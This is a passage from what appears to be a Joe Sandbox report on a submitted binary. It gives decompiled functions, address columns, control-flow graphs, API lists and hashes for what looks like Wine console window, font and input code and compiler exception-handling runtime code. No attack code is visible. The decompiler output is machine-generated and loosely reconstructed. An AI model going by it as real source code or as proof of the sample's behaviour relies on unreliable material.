						_v1000 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24));
					}
					 *_t167 = _v1000;
					_v1024 = _v996;
					E0024C3F0();
					_v12 = 1;
				} else {
					_v12 = 1;
				}
				return _v12;
			}




























                                                                                                                          0x0024a6c0
                                                                                                                          0x0024a6d0
                                                                                                                          0x0024a6f0
                                                                                                                          0x0024a6f8
                                                                                                                          0x0024a702
                                                                                                                          0x0024a733
                                                                                                                          0x0024a73a
                                                                                                                          0x0024a73e
                                                                                                                          0x0024a743
                                                                                                                          0x0024a708
                                                                                                                          0x0024a714
                                                                                                                          0x0024a717
                                                                                                                          0x0024a71b
                                                                                                                          0x0024a720
                                                                                                                          0x0024a720
                                                                                                                          0x0024a764
                                                                                                                          0x0024a769
                                                                                                                          0x0024a779
                                                                                                                          0x0024a77f
                                                                                                                          0x0024a789
                                                                                                                          0x0024a7a5
                                                                                                                          0x0024a7ab
                                                                                                                          0x0024a7d0
                                                                                                                          0x0024a7e6
                                                                                                                          0x0024a7ec
                                                                                                                          0x0024a7fc
                                                                                                                          0x0024a80b
                                                                                                                          0x0024a814
                                                                                                                          0x0024a824
                                                                                                                          0x0024a82a
                                                                                                                          0x0024a834
                                                                                                                          0x0024a850
                                                                                                                          0x0024a856
                                                                                                                          0x0024a87b
                                                                                                                          0x0024a891
                                                                                                                          0x0024a897
                                                                                                                          0x0024a8a7
                                                                                                                          0x0024a8b6
                                                                                                                          0x0024a8bf
                                                                                                                          0x0024a8c5
                                                                                                                          0x0024a8c8
                                                                                                                          0x0024a8cd
                                                                                                                          0x0024a8d0
                                                                                                                          0x0024a8dc
                                                                                                                          0x0024a8f2
                                                                                                                          0x0024a8f5
                                                                                                                          0x0024a8fd
                                                                                                                          0x0024a904
                                                                                                                          0x0024a90a
                                                                                                                          0x0024a921
                                                                                                                          0x0024a924
                                                                                                                          0x0024a928
                                                                                                                          0x0024a92c
                                                                                                                          0x0024a930
                                                                                                                          0x0024a936
                                                                                                                          0x0024a93c
                                                                                                                          0x0024a94e
                                                                                                                          0x0024a951
                                                                                                                          0x0024a955
                                                                                                                          0x0024a955
                                                                                                                          0x0024a969
                                                                                                                          0x0024a96b
                                                                                                                          0x0024a96e
                                                                                                                          0x0024a970
                                                                                                                          0x0024a97f
                                                                                                                          0x0024a995
                                                                                                                          0x0024a9a7
                                                                                                                          0x0024a9aa
                                                                                                                          0x0024a9ae
                                                                                                                          0x0024a9b3
                                                                                                                          0x0024a9bc
                                                                                                                          0x0024a9bf
                                                                                                                          0x0024a9c4
                                                                                                                          0x0024a9c4
                                                                                                                          0x0024a9d0
                                                                                                                          0x0024a9da
                                                                                                                          0x0024a9f9
                                                                                                                          0x0024a9e0
                                                                                                                          0x0024a9ec
                                                                                                                          0x0024a9ec
                                                                                                                          0x0024aa10
                                                                                                                          0x0024aa13
                                                                                                                          0x0024aa17
                                                                                                                          0x0024aa1f
                                                                                                                          0x0024a985
                                                                                                                          0x0024a985
                                                                                                                          0x0024a985
                                                                                                                          0x0024aa31

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleLoadModule$ClassCursorObjectRegisterStock$StringVisibleWindow
                                                                                                                          • String ID: Setup$WineConColorPreview$WineConFontPreview$@.v
                                                                                                                          • API String ID: 3977189380-1132709736
                                                                                                                          • Opcode ID: 60c334ce1855f0231097c1a3f7c7ff86978b657a34a658c19d5354b4b56da4b1
                                                                                                                          • Instruction ID: 05d8913daee9c2be6399a35389642dbee356c491d3efaa9b08d56dba33b3f223
                                                                                                                          • Opcode Fuzzy Hash: 60c334ce1855f0231097c1a3f7c7ff86978b657a34a658c19d5354b4b56da4b1
                                                                                                                          • Instruction Fuzzy Hash: D791CAB09152189FEB54EF68D94979DBBF4FB04304F0085AAE889E7350D7749A98CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00247B60 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 281COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 682 247b60-247b80 call 24d100 685 247b86-247ba7 682->685 686 247bcd-247bf7 CreateEventW 682->686 689 247bad-247bc5 685->689 690 247bc8 685->690 687 247bfa-247c60 686->687 692 247c66-247c8f 687->692 693 247c9f-247ca6 687->693 689->690 690->686 700 247c95 692->700 701 247c9a 692->701 694 247cb1-247d58 EnterCriticalSection call 248090 MultiByteToWideChar 693->694 695 247cac 693->695 713 247d62-247d6e 694->713 697 247fa8 695->697 702 247fad-247fc6 EnterCriticalSection 697->702 700->697 701->693 704 247fcc-247ffb call 245780 702->704 705 247ffe-248005 702->705 704->705 707 248042-248082 CloseHandle LeaveCriticalSection 705->707 708 24800b-24801c 705->708 711 248022-24803a 708->711 712 24803d 708->712 711->712 712->707 714 247d74-247d99 713->714 715 247f1d-247f32 call 241200 713->715 718 247df4-247e06 LeaveCriticalSection 714->718 719 247d9f-247dad 714->719 722 247f91-247fa3 LeaveCriticalSection 715->722 723 247f38-247f3f 715->723 718->702 724 247e36-247e62 call 2480b0 719->724 725 247db3-247dc1 719->725 722->687 723->722 727 247f45-247f8e call 245780 723->727 733 247f04-247f18 724->733 730 247dc7-247dd5 725->730 731 247e0b-247e31 call 2480b0 725->731 727->722 739 247e67-247eac call 248430 730->739 740 247ddb-247de9 730->740 731->733 733->713 739->733 744 247eb1-247ed9 call 2480b0 740->744 745 247def-247f01 call 2485d0 740->745 744->733 745->733
                                                                                                                          APIs
                                                                                                                          • CreateEventW.KERNEL32 ref: 00247BEE
                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 00247CBA
                                                                                                                          • MultiByteToWideChar.KERNEL32 ref: 00247D49
                                                                                                                          • LeaveCriticalSection.KERNEL32 ref: 00247DFD
                                                                                                                          • LeaveCriticalSection.KERNEL32 ref: 00247F9A
                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 00247FB6
                                                                                                                          • CloseHandle.KERNEL32 ref: 0024804E
                                                                                                                          • LeaveCriticalSection.KERNEL32 ref: 0024806D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$Leave$Enter$ByteCharCloseCreateEventHandleMultiWide
                                                                                                                          • String ID: H$input restore failed: %#lx$input setup failed: %#lx
                                                                                                                          • API String ID: 628538822-1542851097
                                                                                                                          • Opcode ID: 5a86b157bc9bea5bf325772672a38d2ef45151c42e57eede771e99cdfa9815ef
                                                                                                                          • Instruction ID: 34207fb786d82ff33addd3c4a01da3355e5a3f0de51fda258ab0c40fe1213c82
                                                                                                                          • Opcode Fuzzy Hash: 5a86b157bc9bea5bf325772672a38d2ef45151c42e57eede771e99cdfa9815ef
                                                                                                                          • Instruction Fuzzy Hash: 20D15DB0819215CFD715EF68D8987AEBBF4BF44310F0089ADE4A997380D7749A98CF52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00242420 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 177COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 752 242420-242465 GetACP TranslateCharsetInfo 753 242477-2424a2 GetStartupInfoW 752->753 754 24246b-242472 752->754 756 242597-2425c4 call 2433b0 753->756 757 2424a8-2424df call 251259 call 251011 753->757 755 242780-24278b 754->755 762 2425dc-2425e8 756->762 763 2425ca-2425d9 756->763 768 2424e5-2424ec 757->768 769 2424f1 757->769 765 2425ee-2425f4 762->765 766 2425fa-24272c GetModuleHandleW LoadIconW GetStockObject RegisterClassW CreateWindowExW 762->766 763->762 765->766 772 242732-242739 766->772 773 24273e-242743 766->773 768->755 771 2424fb-242507 769->771 774 24250d-242520 771->774 775 24257f-242591 771->775 772->755 776 242761-242779 call 244af0 773->776 777 242749-24275e call 244980 773->777 778 242536-242546 774->778 779 242526-242531 774->779 775->756 776->755 777->776 781 24254c-24257a 778->781 779->781 781->771
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Info$CharsetStartupTranslate
                                                                                                                          • String ID: WineConsoleClass$@.v
                                                                                                                          • API String ID: 3822699805-1808220505
                                                                                                                          • Opcode ID: 9dcd748d78eaecb9d87f4b880b6dd56915dbc3ce085aed0ed940a0c650835cbb
                                                                                                                          • Instruction ID: 376bcdb107623f883d10465a3bb55bde2937d3c8a9c65e56f901913b788f41dc
                                                                                                                          • Opcode Fuzzy Hash: 9dcd748d78eaecb9d87f4b880b6dd56915dbc3ce085aed0ed940a0c650835cbb
                                                                                                                          • Instruction Fuzzy Hash: B591C5B4914219CFDB14DF68D998B9DBBF0FB48304F0085A9E889AB350D7759A98CF41
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00242E60 Relevance: 16.7, APIs: 11, Instructions: 228COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 785 242e60-242e8b 786 242e91-242ea5 785->786 787 242f62-242f80 GetDC 785->787 786->787 788 242eab-242ec0 786->788 789 242f86-242f8d 787->789 790 242f92-242fa7 CreateFontIndirectW 787->790 788->787 793 242ec6-242ecd 788->793 794 2431de-2431e9 789->794 791 242fad-242fd3 ReleaseDC 790->791 792 242fd8-243134 SelectObject GetTextMetricsW GetTextFaceW SelectObject ReleaseDC call 250f8d call 251011 call 24f6f0 GetCPInfo 790->792 791->794 810 243153-243160 792->810 811 24313a-243141 792->811 793->787 795 242ed3-242eda 793->795 795->787 797 242ee0-242ee7 795->797 797->787 799 242eed-242f17 call 251259 797->799 799->787 805 242f1d-242f50 call 24e06e 799->805 805->787 812 242f56-242f5d 805->812 814 243166-24317b DeleteObject 810->814 815 24317e-2431a9 810->815 811->810 813 243147-243150 811->813 812->794 813->810 814->815 816 2431d7 815->816 817 2431af-2431d0 DeleteObject 815->817 816->794 817->816
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$DeleteReleaseSelectText$CreateFaceFontIndirectInfoMetrics
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2170087643-0
                                                                                                                          • Opcode ID: 8ba2536d73090e5675652aa6dc1a89a89df96868b4091ae4e223a0cb12f674dc
                                                                                                                          • Instruction ID: a68137ee94c1987f88ed34074324359c8eb986ce243b4e73851f5d03cf79df88
                                                                                                                          • Opcode Fuzzy Hash: 8ba2536d73090e5675652aa6dc1a89a89df96868b4091ae4e223a0cb12f674dc
                                                                                                                          • Instruction Fuzzy Hash: EBB18174A14209DFCB14DF68D588A99BBF1FF48310F45C4A9E899DB361DB30E998CB41
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00257AC2 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 303COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 818 257ac2-257aed call 258c98 821 257e61-257e66 call 251c1c 818->821 822 257af3-257af6 818->822 822->821 823 257afc-257b05 822->823 826 257c02-257c08 823->826 827 257b0b-257b0f 823->827 829 257c10-257c1e 826->829 827->826 828 257b15-257b1c 827->828 832 257b34-257b39 828->832 833 257b1e-257b25 828->833 830 257c24-257c28 829->830 831 257dca-257dcd 829->831 830->831 837 257c2e-257c35 830->837 834 257df0-257df9 call 251cae 831->834 835 257dcf-257dd2 831->835 832->826 836 257b3f-257b47 call 251cae 832->836 833->832 838 257b27-257b2e 833->838 834->821 852 257dfb-257dff 834->852 835->821 839 257dd8-257ded call 257ee7 835->839 851 257b4d-257b66 call 251cae * 2 836->851 836->852 841 257c37-257c3e 837->841 842 257c4d-257c53 837->842 838->826 838->832 839->834 841->842 846 257c40-257c47 841->846 847 257c59-257c80 call 2541fe 842->847 848 257d6a-257d6e 842->848 846->831 846->842 847->848 863 257c86-257c89 847->863 854 257d70-257d79 call 24dc95 848->854 855 257d7a-257d86 848->855 851->821 877 257b6c-257b72 851->877 854->855 855->834 856 257d88-257d92 855->856 860 257d94-257d96 856->860 861 257da0-257da2 856->861 860->834 865 257d98-257d9c 860->865 866 257da4-257db7 call 251cae * 2 861->866 867 257db9-257dc6 call 257682 861->867 869 257c8c-257ca1 863->869 865->834 870 257d9e 865->870 894 257e00 call 2511bb 866->894 885 257e25-257e3a call 251cae * 2 867->885 886 257dc8 867->886 873 257ca7-257caa 869->873 874 257d4b-257d5e 869->874 870->866 873->874 879 257cb0-257cb8 873->879 874->869 878 257d64-257d67 874->878 882 257b74-257b78 877->882 883 257b9e-257ba6 call 251cae 877->883 878->848 879->874 884 257cbe-257cd2 879->884 882->883 889 257b7a-257b81 882->889 900 257ba8-257bc8 call 251cae * 2 call 257682 883->900 901 257c0a-257c0d 883->901 890 257cd5-257ce6 884->890 914 257e3c 885->914 915 257e3f-257e5c call 25429e call 25735a call 257372 call 25771c 885->915 886->834 895 257b95-257b98 889->895 896 257b83-257b8a 889->896 897 257d0c-257d19 890->897 898 257ce8-257cf9 call 25785d 890->898 910 257e05-257e20 call 24dc95 call 257406 call 258d45 894->910 895->821 895->883 896->895 905 257b8c-257b93 896->905 897->890 903 257d1b 897->903 911 257d1d-257d45 call 257e67 898->911 912 257cfb-257d04 898->912 900->901 932 257bca-257bcf 900->932 901->829 909 257d48 903->909 905->883 905->895 909->874 910->885 911->909 912->898 917 257d06-257d09 912->917 914->915 915->821 917->897 932->894 934 257bd5-257be8 call 25744a 932->934 934->910 939 257bee-257bfa 934->939 939->894 940 257c00 939->940 940->934
                                                                                                                          C-Code - Quality: 63%
                                                                                                                          			E00257AC2(signed int __edx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				signed int* _v52;
				intOrPtr _v56;
				signed int _v64;
				void* _v68;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v100;
				char _v104;
				signed int _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t146;
				signed int _t152;
				void* _t155;
				signed char _t160;
				signed int _t161;
				void* _t163;
				void* _t166;
				void* _t169;
				intOrPtr* _t179;
				void* _t182;
				intOrPtr* _t183;
				signed int _t184;
				signed int _t185;
				signed int _t187;
				void* _t191;
				void* _t196;
				void* _t197;
				intOrPtr _t201;
				intOrPtr* _t202;
				signed int _t203;
				signed int _t210;
				signed int _t211;
				intOrPtr _t214;
				signed int* _t218;
				signed int _t219;
				signed int _t224;
				signed int _t225;
				signed int _t231;
				void* _t234;
				void* _t235;

				_t216 = __edx;
				_t218 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t204 = E00258C98(_a8, _a16, _t218);
				_t235 = _t234 + 0xc;
				_v12 = _t204;
				if(_t204 < 0xffffffff || _t204 >= _t218[1]) {
					L67:
					E00251C1C(_t202, _t204, _t216, _t225);
					asm("int3");
					__eflags = _v88;
					_push(_t202);
					_t203 = _v92;
					_push(_t225);
					_push(_t218);
					_t219 = _v108;
					if(__eflags != 0) {
						_push(_a24);
						_push(_t203);
						_push(_t219);
						_push(_v0);
						E00257A29(_t203, _t219, _t225, __eflags);
						_t235 = _t235 + 0x10;
					}
					_t146 = _a36;
					__eflags = _t146;
					if(_t146 == 0) {
						_t146 = _t219;
					}
					E0025429E(_t204, _t146, _v0);
					_t226 = _a28;
					_push( *_a28);
					_push(_a16);
					_push(_a12);
					_push(_t219);
					E00257272(_t203, _t204, _t216, _t219, _a28, __eflags);
					E00258CB5(_t219, _a16,  *((intOrPtr*)(_t226 + 4)) + 1);
					_push(0x100);
					_push(_a32);
					_push( *((intOrPtr*)(_t203 + 0xc)));
					_push(_a16);
					_push(_a8);
					_push(_t219);
					_push(_v0);
					_t152 = E00257469(_t203, _t216, _t219, _t226, __eflags);
					__eflags = _t152;
					if(_t152 != 0) {
						E0025426E(_t152, _t219);
						return _t152;
					}
					return _t152;
				} else {
					_t202 = _a4;
					if( *_t202 != 0xe06d7363 ||  *((intOrPtr*)(_t202 + 0x10)) != 3 ||  *((intOrPtr*)(_t202 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
						L22:
						_t216 = _a12;
						_v8 = _a12;
						goto L24;
					} else {
						_t225 = 0;
						if( *((intOrPtr*)(_t202 + 0x1c)) != 0) {
							goto L22;
						} else {
							_t155 = E00251CAE(_t202, _t204, _t216, 0);
							if( *((intOrPtr*)(_t155 + 0x10)) == 0) {
								L61:
								return _t155;
							} else {
								_t202 =  *((intOrPtr*)(E00251CAE(_t202, _t204, _t216, 0) + 0x10));
								_t191 = E00251CAE(_t202, _t204, _t216, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t191 + 0x14));
								if(_t202 == 0 ||  *_t202 == 0xe06d7363 &&  *((intOrPtr*)(_t202 + 0x10)) == 3 && ( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930522) &&  *((intOrPtr*)(_t202 + 0x1c)) == _t225) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E00251CAE(_t202, _t204, _t216, _t225) + 0x1c)) == _t225) {
										L23:
										_t216 = _v8;
										_t204 = _v12;
										L24:
										_v52 = _t218;
										_v48 = 0;
										__eflags =  *_t202 - 0xe06d7363;
										if( *_t202 != 0xe06d7363) {
											L57:
											__eflags = _t218[3];
											if(_t218[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													E00257EE7(_t204, _t216, _t218, _t225, _t202, _a8, _t216, _a16, _t218, _t204, _a28, _a32);
													_t235 = _t235 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags =  *((intOrPtr*)(_t202 + 0x10)) - 3;
											if( *((intOrPtr*)(_t202 + 0x10)) != 3) {
												goto L57;
											} else {
												__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930520;
												if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520) {
													L29:
													_t225 = _a32;
													__eflags = _t218[3];
													if(_t218[3] > 0) {
														E002541FE(_t204,  &_v68,  &_v52, _t204, _a16, _t218, _a28);
														_t216 = _v64;
														_t235 = _t235 + 0x18;
														_t179 = _v68;
														_v44 = _t179;
														_v16 = _t216;
														__eflags = _t216 - _v56;
														if(_t216 < _v56) {
															_t210 = _t216 * 0x14;
															__eflags = _t210;
															_v32 = _t210;
															do {
																_t57 =  &_v104; // 0x257852
																_t211 = 5;
																_t182 = memcpy(_t57,  *((intOrPtr*)( *_t179 + 0x10)) + _t210, _t211 << 2);
																_t235 = _t235 + 0xc;
																__eflags = _v104 - _t182;
																if(_v104 <= _t182) {
																	__eflags = _t182 - _v100;
																	if(_t182 <= _v100) {
																		_t214 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																			_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x1c)) + 0xc));
																			_t184 = _t183 + 4;
																			__eflags = _t184;
																			_v36 = _t184;
																			_t185 = _v88;
																			_v40 =  *_t183;
																			_v24 = _t185;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t231 = _v40;
																				_t224 = _v36;
																				__eflags = _t231;
																				if(_t231 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_t187 = E0025785D( &_v84,  *_t224, _t217);
																						_t235 = _t235 + 0xc;
																						__eflags = _t187;
																						if(_t187 != 0) {
																							break;
																						}
																						_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																						_t231 = _t231 - 1;
																						_t224 = _t224 + 4;
																						__eflags = _t231;
																						if(_t231 > 0) {
																							continue;
																						} else {
																							_t214 = _v20;
																							_t185 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_t82 =  &_v104; // 0x257852
																					_push(_v28);
																					_push(_a32);
																					_push(_a28);
																					_push( *_t224);
																					_push( &_v84);
																					_push(_a20);
																					_push(_a16);
																					_push(_v8);
																					_push(_a8);
																					_push(_t202);
																					L68();
																					_t235 = _t235 + 0x30;
																				}
																				L43:
																				_t216 = _v16;
																				goto L44;
																				L40:
																				_t214 = _t214 + 1;
																				_t185 = _t185 + 0x10;
																				_v20 = _t214;
																				_v24 = _t185;
																				__eflags = _t214 - _v92;
																			} while (_t214 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t216 = _t216 + 1;
																_t179 = _v44;
																_t210 = _v32 + 0x14;
																_v16 = _t216;
																_v32 = _t210;
																__eflags = _t216 - _v56;
															} while (_t216 < _v56);
															_t218 = _a20;
															_t225 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E0024DC95(_t202, _t218, _t225, __eflags);
														_t204 = _t202;
													}
													__eflags = ( *_t218 & 0x1fffffff) - 0x19930521;
													if(( *_t218 & 0x1fffffff) < 0x19930521) {
														L60:
														_t155 = E00251CAE(_t202, _t204, _t216, _t225);
														__eflags =  *(_t155 + 0x1c);
														if( *(_t155 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t160 = _t218[8] >> 2;
														__eflags = _t218[7];
														if(_t218[7] != 0) {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																_push(_t218[7]);
																_t161 = E00257682();
																_t204 = _t202;
																__eflags = _t161;
																if(_t161 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *((intOrPtr*)(E00251CAE(_t202, _t204, _t216, _t225) + 0x10)) = _t202;
																	_t169 = E00251CAE(_t202, _t204, _t216, _t225);
																	_t206 = _v8;
																	 *((intOrPtr*)(_t169 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930521;
													if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930521) {
														goto L29;
													} else {
														__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930522;
														if( *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E00251CAE(_t202, _t204, _t216, _t225) + 0x1c));
										_t196 = E00251CAE(_t202, _t204, _t216, _t225);
										_push(_v16);
										 *(_t196 + 0x1c) = _t225;
										_t197 = E00257682();
										_t206 = _t202;
										if(_t197 != 0) {
											goto L23;
										} else {
											_t218 = _v16;
											_t255 =  *_t218 - _t225;
											if( *_t218 <= _t225) {
												L62:
												E002511BB(_t202, _t206, _t216, _t218, _t225, __eflags);
											} else {
												while(1) {
													_t206 =  *((intOrPtr*)(_t225 + _t218[1] + 4));
													if(E0025744A( *((intOrPtr*)(_t225 + _t218[1] + 4)), _t255, 0x2648c0) != 0) {
														goto L63;
													}
													_t225 = _t225 + 0x10;
													_t201 = _v20 + 1;
													_v20 = _t201;
													_t255 = _t201 -  *_t218;
													if(_t201 >=  *_t218) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t202);
											E0024DC95(_t202, _t218, _t225, __eflags);
											_t204 =  &_v64;
											E00257406( &_v64);
											E00258D45( &_v64, 0x26328c);
											L64:
											 *((intOrPtr*)(E00251CAE(_t202, _t204, _t216, _t225) + 0x10)) = _t202;
											_t163 = E00251CAE(_t202, _t204, _t216, _t225);
											_t204 = _v8;
											 *(_t163 + 0x14) = _v8;
											__eflags = _t225;
											if(_t225 == 0) {
												_t225 = _a8;
											}
											E0025429E(_t204, _t225, _t202);
											L0025735A(_a8, _a16, _t218);
											_t166 = E00257372(_t218);
											_t235 = _t235 + 0x10;
											_push(_t166);
											E0025771C(_t202, _t204, _t216, _t218, _t225, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}



























































                                                                                                                          0x00257ac2
                                                                                                                          0x00257acb
                                                                                                                          0x00257ad4
                                                                                                                          0x00257ada
                                                                                                                          0x00257ae2
                                                                                                                          0x00257ae4
                                                                                                                          0x00257ae7
                                                                                                                          0x00257aed
                                                                                                                          0x00257e61
                                                                                                                          0x00257e61
                                                                                                                          0x00257e66
                                                                                                                          0x00257e6a
                                                                                                                          0x00257e6e
                                                                                                                          0x00257e6f
                                                                                                                          0x00257e72
                                                                                                                          0x00257e73
                                                                                                                          0x00257e74
                                                                                                                          0x00257e77
                                                                                                                          0x00257e79
                                                                                                                          0x00257e7c
                                                                                                                          0x00257e7d
                                                                                                                          0x00257e7e
                                                                                                                          0x00257e81
                                                                                                                          0x00257e86
                                                                                                                          0x00257e86
                                                                                                                          0x00257e89
                                                                                                                          0x00257e8c
                                                                                                                          0x00257e8e
                                                                                                                          0x00257e90
                                                                                                                          0x00257e90
                                                                                                                          0x00257e96
                                                                                                                          0x00257e9b
                                                                                                                          0x00257e9e
                                                                                                                          0x00257ea0
                                                                                                                          0x00257ea3
                                                                                                                          0x00257ea6
                                                                                                                          0x00257ea7
                                                                                                                          0x00257eb5
                                                                                                                          0x00257eba
                                                                                                                          0x00257ebf
                                                                                                                          0x00257ec2
                                                                                                                          0x00257ec5
                                                                                                                          0x00257ec8
                                                                                                                          0x00257ecb
                                                                                                                          0x00257ecc
                                                                                                                          0x00257ecf
                                                                                                                          0x00257ed7
